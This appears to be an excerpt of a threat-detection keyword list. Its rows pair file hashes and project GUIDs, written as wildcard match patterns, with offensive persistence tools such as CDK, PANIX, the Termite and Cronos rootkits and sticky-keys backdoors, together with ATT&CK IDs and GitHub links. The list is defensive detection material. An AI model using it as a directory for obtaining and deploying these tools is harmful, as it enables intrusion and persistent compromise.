797*8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76*.{0,1000}8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30653
798*8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6*.{0,1000}8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z30677
799*8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389*.{0,1000}8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#filehash #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z30766
800*8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105*.{0,1000}8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30818
801*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*.{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}offensive_tool_keywordInvoke-WMIpersistA powershell script to create WMI Event subscription persistenceT1546.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/bspence7337/Invoke-WMIpersist10#filehashN/A101702018-05-18T16:42:52Z2017-11-02T03:47:25Z30819
802*8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec*.{0,1000}8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30863
803*8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591*.{0,1000}8e66227e48270913e40edcabdaa2d20332572f8ca6d066737e4ae3984d66b591.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10#filehashN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z30909
804*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*.{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10#filehashN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z31029
805*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*.{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z31037
806*9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8*.{0,1000}9093453fbce7f48351fa3e6f57793f3dd20737780eb95d25c0b1643d372180f8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31054
807*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*.{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10#filehashN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z31062
808*91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704*.{0,1000}91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31142
809*924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e*.{0,1000}924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31176
810*9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8*.{0,1000}9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31186
811*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*.{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10#GUIDprojectN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z31298
812*9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c*.{0,1000}9484ea212c59a9ada48f9f08204448eaf013891b7b722f9d111f4346f7f17a4c.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31328
813*954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97*.{0,1000}954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31389
814*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*.{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10#filehashN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z31401
815*96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb*.{0,1000}96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31485
816*974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696*.{0,1000}974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#filehash #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z31526
817*9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc*.{0,1000}9870daa238c3cab7fa949a1f8b80d3451c78eb07d18030ad061d8b91d612decc.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10#filehashN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z31590
818*99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d*.{0,1000}99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31676
819*9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4*.{0,1000}9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31727
820*9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70*.{0,1000}9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31729
821*9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74*.{0,1000}9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31783
822*9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b*.{0,1000}9b1c4a631b0c723cdecfc294363b8d10a969dcd3baaf9045ec1fb775f289148b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31784
823*9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a*.{0,1000}9b3d82bb1aff3a17a490dd4da09cd315d8e94a52b8caa31ef7a7cf2a89c9d87a.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z31789
824*9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e*.{0,1000}9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z31873
825*9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230*.{0,1000}9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#filehashN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z31890
826*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*.{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10#GUIDprojectN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z31914
827*9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04*.{0,1000}9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32009
828*9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e*.{0,1000}9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32015
829*9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be*.{0,1000}9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32031
830*9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82*.{0,1000}9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32036
831*9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77*.{0,1000}9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32037
832*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*.{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10#filehashN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z32049
833*9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e*.{0,1000}9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32058
834*9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f*.{0,1000}9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32071
835*9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf*.{0,1000}9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32113
836*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*.{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10#GUIDprojectN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z32223
837*a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9*.{0,1000}a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32252
838*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*.{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10#filehashN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z32255
839*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*.{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB10#GUIDprojectN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z32261
840*a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87*.{0,1000}a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32294
841*a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d*.{0,1000}a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32298
842*a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795*.{0,1000}a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32392
843*a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325*.{0,1000}a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32399
844*a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1*.{0,1000}a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32432
845*a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe*.{0,1000}a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32435
846*a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4*.{0,1000}a487628dc7647507f77cff66269d5d4588c7647e408b07ec0c4b1f16a93eefc4.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z32465
847*a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9*.{0,1000}a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32512
848*a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455*.{0,1000}a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z32542
849*a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c*.{0,1000}a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32769
850*a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7*.{0,1000}a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32806
851*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*.{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10#filehashN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z32813
852*a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498*.{0,1000}a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32869
853*aa142160446a919eaba99ce15992f6e11b1fdaa7a9f569979a29068120f774cf*.{0,1000}aa142160446a919eaba99ce15992f6e11b1fdaa7a9f569979a29068120f774cf.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html10#filehashN/A77N/AN/AN/AN/A32879
854*aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f*.{0,1000}aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z32902
855*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*.{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}offensive_tool_keywordCOM-Object-hijackinguse COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)T1546.015TA0003N/AN/APersistencehttps://github.com/3gstudent/COM-Object-hijacking10#filehashN/A8158302017-08-04T09:19:40Z2017-08-04T08:15:36Z32998
